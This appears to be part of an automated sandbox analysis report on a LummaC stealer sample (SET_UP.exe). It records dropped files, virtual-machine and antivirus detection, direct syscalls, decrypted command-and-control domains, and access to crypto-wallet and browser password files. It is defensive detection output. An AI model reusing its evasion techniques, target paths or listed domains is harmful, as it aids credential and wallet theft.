                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F26C push eax; retf 00FEh34_2_5000F270
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F274 push eax; retf 34_2_5000F278
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F294 push eax; iretd 34_2_5000F298
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_500153A4 push 500153D0h; ret 34_2_500153C8
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F49C push 5000F5F8h; ret 34_2_5000F5F0
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F4A4 push 5000F5F8h; ret 34_2_5000F5F0
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F4AC push 5000F5F8h; ret 34_2_5000F5F0
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F4B4 push 5000F5F8h; ret 34_2_5000F5F0
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F4BC push 5000F5F8h; ret 34_2_5000F5F0
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F4C4 push 5000F5F8h; ret 34_2_5000F5F0
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F4CC push 5000F5F8h; ret 34_2_5000F5F0
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F4D4 push 5000F5F8h; ret 34_2_5000F5F0
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F4DC push 5000F5F8h; ret 34_2_5000F5F0
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F4E4 push 5000F5F8h; ret 34_2_5000F5F0
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F4EC push 5000F5F8h; ret 34_2_5000F5F0
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F4F4 push 5000F5F8h; ret 34_2_5000F5F0
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F4FC push 5000F5F8h; ret 34_2_5000F5F0
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F504 push 5000F5F8h; ret 34_2_5000F5F0
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F50C push 5000F5F8h; ret 34_2_5000F5F0
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F514 push 5000F5F8h; ret 34_2_5000F5F0
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F51C push 5000F5F8h; ret 34_2_5000F5F0
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F524 push 5000F5F8h; ret 34_2_5000F5F0
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F52C push 5000F5F8h; ret 34_2_5000F5F0
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F534 push 5000F5F8h; ret 34_2_5000F5F0
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F53C push 5000F5F8h; ret 34_2_5000F5F0
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F544 push 5000F5F8h; ret 34_2_5000F5F0
                      Source: C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exeFile created: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpFile created: C:\Users\user\AppData\Roaming\UltraMedia\is-36S8B.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpFile created: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exe (copy)Jump to dropped file
                      Source: C:\Users\user\Desktop\SET_UP.exeFile created: C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exeFile created: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpFile created: C:\Users\user\AppData\Roaming\UltraMedia\is-UIAB4.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpFile created: C:\Users\user\AppData\Roaming\UltraMedia\rtl120.bpl (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpFile created: C:\Users\user\AppData\Roaming\UltraMedia\maddisAsm_.bpl (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpFile created: C:\Users\user\AppData\Roaming\UltraMedia\madbasic_.bpl (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpFile created: C:\Users\user\AppData\Roaming\UltraMedia\is-SQ6C4.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpFile created: C:\Users\user\AppData\Local\Temp\is-8TLP5.tmp\_isetup\_setup64.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpFile created: C:\Users\user\AppData\Roaming\UltraMedia\is-OKBGO.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpFile created: C:\Users\user\AppData\Roaming\UltraMedia\madexcept_.bpl (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpFile created: C:\Users\user\AppData\Roaming\UltraMedia\is-RBCNP.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpFile created: C:\Users\user\AppData\Local\Temp\is-N3BQO.tmp\_isetup\_setup64.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpFile created: C:\Users\user\AppData\Roaming\UltraMedia\is-TBCRP.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpFile created: C:\Users\user\AppData\Roaming\UltraMedia\vcl120.bpl (copy)Jump to dropped file
                      Source: C:\Users\user\Desktop\SET_UP.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\SET_UP.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                      Query firmware table information (likely to detect VMs)
                      Source: C:\Users\user\Desktop\SET_UP.exeSystem information queried: FirmwareTableInformationJump to behavior
                      Switches to a custom stack to bypass stack traces
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeAPI/Special instruction interceptor: Address: 6BD77C44
                      Tries to detect virtualization through RDTSC time measurements
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeRDTSC instruction interceptor: First address: 6BD7F3E1 second address: 6BD7F3FD instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-20h], eax 0x00000005 mov dword ptr [ebp-1Ch], edx 0x00000008 lea esi, dword ptr [ebp-38h] 0x0000000b xor eax, eax 0x0000000d xor ecx, ecx 0x0000000f cpuid 0x00000011 mov dword ptr [esi], eax 0x00000013 mov dword ptr [esi+04h], ebx 0x00000016 mov dword ptr [esi+08h], ecx 0x00000019 mov dword ptr [esi+0Ch], edx 0x0000001c rdtsc
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeRDTSC instruction interceptor: First address: 6BD7F3FD second address: 6BD7F3E1 instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-18h], eax 0x00000005 mov dword ptr [ebp-14h], edx 0x00000008 mov eax, dword ptr [ebp-18h] 0x0000000b sub eax, dword ptr [ebp-20h] 0x0000000e mov ecx, dword ptr [ebp-14h] 0x00000011 sbb ecx, dword ptr [ebp-1Ch] 0x00000014 add eax, dword ptr [ebp-10h] 0x00000017 adc ecx, dword ptr [ebp-0Ch] 0x0000001a mov dword ptr [ebp-10h], eax 0x0000001d mov dword ptr [ebp-0Ch], ecx 0x00000020 jmp 00007F1924B79CC5h 0x00000022 mov edx, dword ptr [ebp-04h] 0x00000025 add edx, 01h 0x00000028 mov dword ptr [ebp-04h], edx 0x0000002b cmp dword ptr [ebp-04h], 64h 0x0000002f jnl 00007F1924B79D50h 0x00000031 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\UltraMedia\is-36S8B.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\UltraMedia\is-UIAB4.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\UltraMedia\is-SQ6C4.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-8TLP5.tmp\_isetup\_setup64.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\UltraMedia\is-OKBGO.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-N3BQO.tmp\_isetup\_setup64.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\UltraMedia\is-TBCRP.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\SET_UP.exe TID: 6108Thread sleep time: -180000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5001C0CC @Sysutils@FindFirst$qqrx20System@UnicodeStringir19Sysutils@TSearchRec,@System@@UStrToPWChar$qqrx20System@UnicodeString,FindFirstFileW,@Sysutils@FindClose$qqrr19Sysutils@TSearchRec,GetLastError,34_2_5001C0CC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000C390 GetModuleHandleW,GetProcAddress,lstrcpynW,lstrcpynW,lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,34_2_5000C390
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5001BB34 FindFirstFileW,FindClose,@System@Move$qqrpxvpvi,34_2_5001BB34
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5001BD10 @System@@UStrToPWChar$qqrx20System@UnicodeString,FindFirstFileW,FindClose,34_2_5001BD10
                      Source: SET_UP.exe, 00000000.00000003.1876659268.000000000085A000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1803136809.0000000000850000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2091901198.000000000085B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2099151002.000000000081C000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1939252128.000000000085A000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2099330277.000000000085A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: VER7RSX5CP4YEKECQGJ84KT.tmp, 00000005.00000002.2126727281.000000000108D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
                      Source: VER7RSX5CP4YEKECQGJ84KT.tmp, 00000005.00000002.2126727281.000000000108D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\yZZbr
                      Source: C:\Users\user\Desktop\SET_UP.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_025003C3 mov edx, dword ptr fs:[00000030h]0_2_025003C3
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02500983 mov eax, dword ptr fs:[00000030h]0_2_02500983
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02500FD2 mov eax, dword ptr fs:[00000030h]0_2_02500FD2
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02500FD3 mov eax, dword ptr fs:[00000030h]0_2_02500FD3
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02500D33 mov eax, dword ptr fs:[00000030h]0_2_02500D33
                      Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Found direct / indirect Syscall (likely to bypass EDR)
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeNtQuerySystemInformation: Direct from: 0x57007C8B
                      LummaC encrypted strings found
                      Source: SET_UP.exeString found in binary or memory: bashfulacid.lat
                      Source: SET_UP.exeString found in binary or memory: tentabatte.lat
                      Source: SET_UP.exeString found in binary or memory: slipperyloo.lat
                      Source: SET_UP.exeString found in binary or memory: wordyfindy.lat
                      Source: SET_UP.exeString found in binary or memory: laborersquei.click
                      Source: SET_UP.exeString found in binary or memory: curverpluch.lat
                      Source: SET_UP.exeString found in binary or memory: talkynicer.lat
                      Source: SET_UP.exeString found in binary or memory: shapestickyr.lat
                      Source: SET_UP.exeString found in binary or memory: manyrestro.lat
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpProcess created: C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe "C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe" /VERYSILENT /NORESTARTJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpProcess created: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exe "C:\Users\user\AppData\Roaming\UltraMedia\IUService.exe" Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: @System@LoadResourceModule$qqrpbo,GetModuleFileNameW,RegOpenKeyExW,RegOpenKeyExW,RegOpenKeyExW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,lstrcpynW,GetThreadLocale,GetLocaleInfoW,lstrlenW,lstrcpynW,LoadLibraryExW,lstrcpynW,LoadLibraryExW,lstrcpynW,LoadLibraryExW,34_2_5000C58C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: @Sysutils@GetLocaleStr$qqriix20System@UnicodeString,GetLocaleInfoW,@System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi,@System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString,34_2_50025B78
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: @Sysutils@GetLocaleChar$qqriib,GetLocaleInfoW,34_2_50025BC4
                      Source: C:\Users\user\Desktop\SET_UP.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_50022830 @Sysutils@CurrentYear$qqrv,GetLocalTime,34_2_50022830
                      Source: C:\Users\user\Desktop\SET_UP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: SET_UP.exe, 00000000.00000003.2091830519.000000000352E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1973844479.0000000003529000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: find.exe, 00000019.00000002.2259508999.000001D54F8B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avgui.exe
                      Source: C:\Users\user\Desktop\SET_UP.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                      Stealing of Sensitive Information

                      barindex
                      Yara detected LummaC Stealer
                      Source: Yara matchFile source: Process Memory Space: SET_UP.exe PID: 6556, type: MEMORYSTR
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                      Found many strings related to Crypto-Wallets (likely being stolen)
                      Source: SET_UP.exe, 00000000.00000003.1876587770.000000000089A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s/Electrum-LTC
                      Source: SET_UP.exe, 00000000.00000003.1876587770.000000000089A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: llets/ElectronCash
                      Source: SET_UP.exe, 00000000.00000003.1876587770.000000000089A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                      Source: SET_UP.exe, 00000000.00000003.1876659268.000000000087A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                      Source: SET_UP.exe, 00000000.00000003.1876659268.000000000087F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                      Source: SET_UP.exe, 00000000.00000002.2099151002.0000000000826000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: omihkjbmgjidlcdno","ez":"ExodusWeb3"},{"en":"onh
                      Source: SET_UP.exe, 00000000.00000003.1826911184.0000000000899000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance
                      Source: SET_UP.exe, 00000000.00000003.1876659268.000000000087A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                      Source: SET_UP.exe, 00000000.00000003.1876587770.000000000089A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                      Source: SET_UP.exe, 00000000.00000003.1876587770.000000000089A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                      Source: SET_UP.exe, 00000000.00000003.1826911184.0000000000899000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ledger Livet
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
